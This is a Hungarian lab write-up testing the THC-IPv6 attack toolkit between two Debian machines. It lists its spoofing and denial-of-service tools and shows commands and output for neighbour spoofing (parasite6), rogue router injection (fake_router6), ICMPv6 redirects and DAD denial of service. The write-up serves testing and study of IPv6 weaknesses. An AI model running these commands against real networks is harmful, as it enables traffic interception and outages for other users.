IPv6 specifikus hacking eszközök
A THC-IPv6 eszközkészlet célja különböző támadások megvalósítása, specifikusan az IPv6 protokollt célozva. A készlet a követekző eszközöket tartamazza:
alive6 - felderítő eszköz, adott címre válaszoló rendszerekhez
detect-new-ip6 - hálózathoz újonnan csatlakozó eszközök automatikus felderítése.
dos-new-ip6 - címütközés hamisítása és így az újonnan csatlakozó eszközök működésének megbénítása.
fake_advertiser6 - hirdetések hamisítása.
fake_mipv6 - mobil IP címek hamis kérése.
fake_mld6 - Multicas csoport üzenetek hamisítására
fake_router6 - Router üzenetek hamisítására, közbeékelődéses és forgalomelterelő támadásokhoz
parasite6 - ICMP6 neighbour solicitation üzenetek hamisítására, például beékelődéses támadások létrehozásához
redir6 - beékeléses támadás ICMP6 redirect üzenetek hamisításával
rsmurf6 - Távoli smurf támadás
sendpees6 - ND neighbour solicitation üzenetek generálás, a célpont CPU idejének fogyasztásához.
smurf6 - Helyi smirf támadás.
toobig6 - Hamis üzenetekkel MTU csökkentése.
A csomag telepítése
A teszt Debian Linux alatt történt, a telepítés csomagból történt. A következő lényeges csomagokat kellett telepíteni, az apt-get install ... csomagkezelő használatával: gcc, libc6, libc-dev, libpcap-dev, libssl-dev. Ezek után a THC forrásból fordítható.
THC tesztek
Képernyőképek az eszközök használatáról
Alive6
./alive6 eth0 Alive: fe80:0000:0000:0000:020c:29ff:fed8:f478 Found 1 systems alive Sikeresen felismerte a másik Linux-os gép Link Local IP címét.
Parasite6
A spoofingot végző hoszt IP címei:
ip -6 addr 1: lo: <LOOPBACK,UP> mtu 16436 inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: eth0: <BROADCAST,MULTICAST,UP> mtu 1492 qlen 1000 inet6 fec0::1/124 scope site valid_lft forever preferred_lft forever inet6 fe80::20c:29ff:fed8:f478/64 scope link valid_lft forever preferred_lft forever
Minden forgalom átirányítása saját maga felé, ezzel egyidőben a másik gépen ping6 forgalmat generalok, hogy legyen mit eltéríteni (ping6 fec0::3 -I eth0, ping6 fec0::4 -I eth0):
./parasite6 eth0 Remember to enable routing (ip_forwarding), you will denial service otherwise! Started ICMP6 Neighbor Solitication Interceptor (Press Control-C to end) ... Spoofed packet to fec0:0000:0000:0000:0000:0000:0000:0002 as fec0:0000:0000:0000:0000:0000:0000:0001 Spoofed packet to fe80:0000:0000:0000:0219:e0ff:fe14:6503 as fec0:0000:0000:0000:0000:0000:0000:0002 Spoofed packet to fe80:0000:0000:0000:020c:29ff:fed8:f478 as fe80:0000:0000:0000:0219:e0ff:fe14:6503 Spoofed packet to fe80:0000:0000:0000:0219:e0ff:fe14:6503 as fe80:0000:0000:0000:020c:29ff:fed8:f478 Spoofed packet to fec0:0000:0000:0000:0000:0000:0000:0002 as fec0:0000:0000:0000:0000:0000:0000:0003 Spoofed packet to fec0:0000:0000:0000:0000:0000:0000:0002 as fec0:0000:0000:0000:0000:0000:0000:0004
A másik gépen ezután több fals szomszéd is látszik:
ip -6 neigh fec0::4 dev eth0 lladdr 00:19:e0:14:65:03 STALE fec0::3 dev eth0 lladdr 00:19:e0:14:65:03 STALE
Fake_router6
Előtte:
ip -6 route fe80::/64 dev eth0 metric 256 expires 21332474sec mtu 1492 advmss 1432 hoplimit 4294967295 fec0::/124 dev eth0 metric 256 expires 21332933sec mtu 1492 advmss 1432 hoplimit 4294967295 ff00::/8 dev eth0 metric 256 expires 21332474sec mtu 1492 advmss 1432 hoplimit 4294967295 unreachable default dev lo proto none metric -1 error -101 hoplimit 255
Jöhet a fals route beinjektálása:
./fake_router6 eth0 fe80::1 2001:2001::/32 1500 Starting to advertise router fe80::1 (Press Control-C to end) ...
Ezután a másik gép routing táblája:
ip -6 route 2001:2001::/32 dev eth0 proto kernel metric 256 expires 8590469sec mtu 1492 advmss 1432 hoplimit 4294967295 fe80::/64 dev eth0 metric 256 expires 21332362sec mtu 1492 advmss 1432 hoplimit 4294967295 fec0::/124 dev eth0 metric 256 expires 21332821sec mtu 1492 advmss 1432 hoplimit 4294967295 ff00::/8 dev eth0 metric 256 expires 21332362sec mtu 1492 advmss 1432 hoplimit 4294967295 default via fe80::1 dev eth0 proto kernel metric 1024 expires 65538sec mtu 1492 advmss 1432 hoplimit 255 unreachable default dev lo proto none metric -1 error -101 hoplimit 255
Látható, hogy valóban bekerült az új routing bejegyzés.
Redir6
Előtte:
ip -6 route fe80::/64 dev eth0 metric 256 expires 21331811sec mtu 1492 advmss 1432 hoplimit 4294967295 fec0::/124 dev eth0 metric 256 expires 21332270sec mtu 1492 advmss 1432 hoplimit 4294967295 fec0::1:1 via fec0::5 dev eth0 metric 1024 expires 21334372sec mtu 1492 advmss 1432 hoplimit 4294967295 ff00::/8 dev eth0 metric 256 expires 21331811sec mtu 1492 advmss 1432 hoplimit 4294967295 unreachable default dev lo proto none metric -1 error -101 hoplimit 255
Felvéve egy routot egy fec0::1:1 címre, ezt akarjuk majd eltéríteni.
./redir6 eth0 fec0::2 fec0::1:1 fec0::5 fec0::1
Nem lett új route bejegyzés, de érdemes megnézni a capture fájlt. Valószínűleg a routerek hiánya miatt nem sikerült eltéríteni.
Dos-new-ip6
./dos-new-ip6 eth0 Started ICMP6 DAD Denial-of-Service (Press Control-C to end) ... Spoofed packet for existing ip6 as fe80:0000:0000:0000:0000:0000:0000:0001 Spoofed packet for existing ip6 as fe80:0000:0000:0000:0000:0000:0000:0002 Spoofed packet for existing ip6 as fe80:0000:0000:0000:020c:29ff:fed8:f478
Valóban nem enged új interfészeket feljönni a linkre.
A detect-new-ip6 gyakoraltilag ugyanazt csinálja, mint az alive6.
A smurf6 attack-ot nem lehet egy ilyen kicsi hálózat esetén kipróbálni (tulajdonképpen két ipv6 eszközvolt a próba során összekötve). A Debian nem reagált sem a smurf, sem a sendpees támadásra, csak a kérések láthatóak a vonalon. Az önkéntes Neighbor Advertisementre a másik gép nem reagál, nem írja be a szomszédok közé a hírdetett IP-t.